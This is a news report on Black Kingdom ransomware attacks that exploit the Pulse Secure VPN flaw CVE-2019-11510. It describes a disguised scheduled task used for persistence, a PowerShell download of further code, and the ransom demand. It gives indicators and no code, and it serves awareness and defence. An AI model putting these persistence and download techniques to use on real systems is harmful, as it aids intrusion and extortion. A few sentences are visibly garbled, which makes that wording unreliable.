Researchers at REDTEAM.PL, a Polish-based cybersecurity firm, have observed ransomware attacks by Black Kingdom that exploit a vulnerability in the Pulse Secure VPN patched last year.
Tracked as CVE-2019-11510 and with a CVSS score of 10, Pulse Secure’s vulnerability was the most serious of several security flaws identified in enterprise VPNs.
An arbitrary file read issue, the bug could allow unauthenticated attackers to exfiltrate credentials that can then be used to compromise private VPN networks in combination with a remote command injection vulnerability in Pulse Secure products (CVE-2019-11539).
Pulse Secure released patches for the identified issues in April 2019, and said most customers had already installed them in August 2019. However, some organizations still don’t seem to have patched their systems.
The U.S. In a warning issued earlier this year Cybersecurity and Infrastructure Security Agency (CISA) warned that patching vulnerable VPNs would not be enough to keep out attackers, especially if the vulnerability has already been exploited.
In August of last year, the first cyberattacks targeting this vulnerability were observed, but the targeting has continued to date, with state-sponsored actors joining the fray since late 2019. Security researchers revealed in January that operators of ransomware Sodinokibi began targeting the flaw.
Now, REDTEAM.PL says the threat actor behind the ransomware for the Black Kingdom is also exploiting CVE-2019-11510 to compromise the infrastructure of enterprises.
The attackers use a scheduled task named GoogleUpdateTaskMachineUSA to achieve persistence after initial compromise. The name of the task closely resembles that of a legitimate Google Chrome task, ending in UA, not USA.
The malicious task executes code for running a PowerShell script that downloads additional code from an IP address which is also used to launch network attack. The ransomware append the.black kingdom extension to the encrypted files once it is up and running on the compromised systems.
The attackers are demanding $10,000 in Bitcoin in the ransom note dropped by the malware, claiming they would destroy all the victim’s data if the ransom is not paid in 600 minutes. The victim is directed to contact the threat actor through the blackingdom e-mail address at gszmail[.]com.